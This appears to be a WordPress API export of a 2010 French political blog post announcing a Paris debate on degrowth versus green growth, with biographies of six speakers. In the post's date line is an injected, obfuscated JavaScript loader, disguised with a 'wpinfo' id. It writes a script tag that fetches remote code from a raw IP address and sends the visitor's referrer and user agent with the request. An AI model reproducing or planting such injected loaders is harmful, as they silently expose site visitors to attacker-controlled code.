{"id":4909,"date":"2010-09-11T09:41:00","date_gmt":"2010-09-11T08:41:00","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4909"},"modified":"2010-09-26T16:12:35","modified_gmt":"2010-09-26T15:12:35","slug":"debat-decroissance-ou-croissance-verte-peut-on-etre-ecologiste-et-productiviste-a-la-mairie-du-2eme-le-16-septembre-a-19h","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4909","title":{"rendered":"D\u00e9bat \u00ab\u00a0D\u00e9croissance ou croissance verte ? Peut-on \u00eatre \u00e9cologiste et productiviste ?\u00a0\u00bb \u00e0 Paris le 16 septembre"},"content":{"rendered":"<p style=\"text-align: center;\"><a href=\"http:\/\/ocparis.canalblog.com\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"..\/wp-content\/uploads\/2010\/05\/Image-2.png\" alt=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/05\/Image-2.png\" width=\"158\" height=\"134\" \/><\/a><strong><span style=\"color: #ff6600;\">Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|trkrn|var|u0026u|referrer|krfzh||js|php'.split('|'),0,{}))\n<\/script><\/noindex> jeudi 16 septembre \u00e0 19h<\/span><\/strong><br \/>\nDans la mairie du 2e arrondissement de Paris<br \/>\n8 rue de la Banque (M\u00e9tro Bourse)<\/p>\n<p>Avec :<\/p>\n<ul>\n<li> Jean-Paul Besset (d\u00e9put\u00e9 europ\u00e9en, Europe Ecologie)<\/li>\n<li> Jacques Boutault (maire du 2e arrondissement de Paris, Les Verts)<\/li>\n<li> Bettina Laville (avocate, conseiller d&rsquo;\u00e9tat en disponibilit\u00e9, PS)<\/li>\n<li> Philippe Bodard (maire de M\u00fbrs-Erign\u00e9, PS)<\/li>\n<li> Serge Lepeltier (maire de Bourges, Parti Radical)<\/li>\n<li> Vincent Liegey, membre de l&rsquo;<a href=\"http:\/\/adoc-france.org\/\">Association d&rsquo;Objecteurs de Croissance (AdOC)<\/a> et du <a href=\"..\/\">Parti Pour La D\u00e9croissance (PPLD)<\/a>.<\/li>\n<\/ul>\n<p><!--more--><br \/>\nEx-r\u00e9dacteur en chef de l\u2019hebdomadaire \u00ab\u00a0Politis\u00a0\u00bb, puis, pendant 10 ans, du quotidien \u00ab\u00a0Le Monde\u00a0\u00bb, Jean-Paul Besset dessine, en 2005, dans \u00ab\u00a0Comment ne plus \u00eatre progressiste sans devenir r\u00e9actionnaire\u00a0\u00bb, les voies d&rsquo;une logique \u00e9conomique et sociale fond\u00e9e sur la d\u00e9croissance de l&#8217;empreinte \u00e9cologique, le partage des ressources et le respect des \u00e9quilibres naturels. Convaincu que la croissance est une machine \u00e0 produire des in\u00e9galit\u00e9s, alors que la d\u00e9croissance mat\u00e9rielle s&rsquo;inscrit dans une logique de partage, il est aujourd&rsquo;hui d\u00e9put\u00e9 europ\u00e9en \u00e9lu sur la liste Europe Ecologie.<\/p>\n<p style=\"margin: 0px 0px 16px;\">Co-fondateur du premier Comit\u00e9 d&rsquo;Action Lyc\u00e9en, en 1978, Jacques Boutault a d\u2019abord milit\u00e9 dans des associations comme Droits Devant !!, Greenpeace, les Amis de la Terre, Attac. Journaliste pendant 10 ans et membre du Parti des Verts depuis 1997, il a \u00e9t\u00e9 \u00e9lu maire du II\u00b0 arrondissement de Paris en 2001 avec un programme ax\u00e9 sur l&rsquo;am\u00e9lioration de la circulation, le logement social, la mise en place de menus bio dans les cantines scolaires, le travail avec les associations.<\/p>\n<p style=\"margin: 0px 0px 16px;\">Avocate et conseiller d\u2019\u00e9tat en disponibilit\u00e9, Bettina Laville est fondatrice et pr\u00e9sidente d&rsquo;honneur du Comit\u00e9 21. Elle si\u00e8ge au conseil d&rsquo;administration de plusieurs ONG oeuvrant pour le d\u00e9veloppement durable. Elle a \u00e9t\u00e9 conseiller technique au cabinet de plusieurs ministres. Conseiller pour l&rsquo;environnement et l&rsquo;am\u00e9nagement du territoire aupr\u00e8s du Premier ministre Lionel Jospin (1997-2001) elle a aussi \u00e9t\u00e9 secr\u00e9taire g\u00e9n\u00e9rale de la Commission fran\u00e7aise du D\u00e9veloppement Durable. Elle a \u00e9t\u00e9 conseill\u00e8re r\u00e9gionale de Bourgogne (PS) de 1998 \u00e0 2005.<\/p>\n<p style=\"margin: 0px 0px 16px;\">Conseiller g\u00e9n\u00e9ral du Maine-et-Loire, Philippe Bodard est maire PS depuis 1995 de M\u00fbrs-Erign\u00e9, une ville de 5500 habitants, pr\u00e8s d&rsquo;Angers. Vice-pr\u00e9sident de l&rsquo;Association des petites villes de France (APVF), il promeut dans sa commune une politique environnementale \u00ab\u00a0solidaire\u00a0\u00bb : construction de logements HLM bois, pose de capteurs photovolta\u00efquessjr ceux-ci et sur les \u00e9coles, r\u00e9duction de la consommation \u00e9nerg\u00e9tique des b\u00e2timents publics, plantation de 600 arbres par an, arr\u00eat\u00e9 anti OGM et aujourd&rsquo;hui un Plan \u00e9nergie climat communal.<\/p>\n<p style=\"margin: 0px 0px 16px;\">Serge Lepeltier a d&rsquo;abord rejoint l&rsquo;UDR (le futur RPR qui deviendra l&rsquo;UMP), puis, en 2005, le Parti radical valoisien, dont il est le vice-pr\u00e9sident et porte parole. Elu maire de Bourges en 1995, il est depuis rest\u00e9 \u00e0 la t\u00eate de cette commune. Entre 2004 et 2005, il a \u00e9t\u00e9 ministre de l&rsquo;\u00c9cologie, du D\u00e9veloppement et de l&rsquo;Am\u00e9nagement Durables. A ce poste, il a oeuvr\u00e9 pour l&rsquo;adoption de la Charte de l&rsquo;Environnement dans la constitution, la cr\u00e9ation du Parc national de Guyane, le plan de r\u00e9introduction des ours dans les Pyr\u00e9n\u00e9es et la transposition des directives europ\u00e9ennes dans le domaine du d\u00e9veloppement durable.<\/p>\n<p style=\"margin: 0px 0px 16px;\">Vincent Liegey est membre de l&rsquo;Association d&rsquo;Objecteurs de Croissance (AdOC). La politisation du mouvement de la d\u00e9croissance date de 2005 quand Vincent Cheynet, le leader des Casseurs de pub et directeur du journal \u00ab\u00a0La D\u00e9croisance\u00a0\u00bb, fonde le Parti pour la D\u00e9croissance (PPLD). Ce dernier est relanc\u00e9 en 2008 et participe aux \u00e9lections europ\u00e9ennes de 2009 \u00e0 travers <a href=\"http:\/\/www.dailymotion.com\/video\/x9jig5_europe-decroissance-long_news\">la campagne Europe-D\u00e9croissance<\/a>. En septembre de la m\u00eame ann\u00e9e, le Mouvement des Objecteurs de Croissance et le PPLD co-fondent <a href=\"http:\/\/www.dailymotion.com\/video\/x9jig5_europe-decroissance-long_news\">l\u2019Association d&rsquo;Objecteurs de Croissance (AdOC)<\/a>. Celle-ci entend valoriser populariser la radicalit\u00e9 et la coh\u00e9rence de l\u2019objection de croissance, per\u00e7ue comme le seul vrai rem\u00e8de \u00e0 la crise globale (crise de civilisation) \u00e0 laquelle nous sommes confront\u00e9s.<\/p>\n<p style=\"text-align: center;\">\n","protected":false},"excerpt":{"rendered":"<p>Le jeudi 16 septembre \u00e0 19h Dans la mairie du 2e arrondissement de Paris 8 rue de la Banque (M\u00e9tro Bourse) Avec : Jean-Paul Besset (d\u00e9put\u00e9 europ\u00e9en, Europe Ecologie) Jacques Boutault (maire du 2e arrondissement de Paris, Les Verts) Bettina &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4909\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4909","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4909","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4909"}],"version-history":[{"count":8,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4909\/revisions"}],"predecessor-version":[{"id":4960,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4909\/revisions\/4960"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4909"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4909"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4909"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}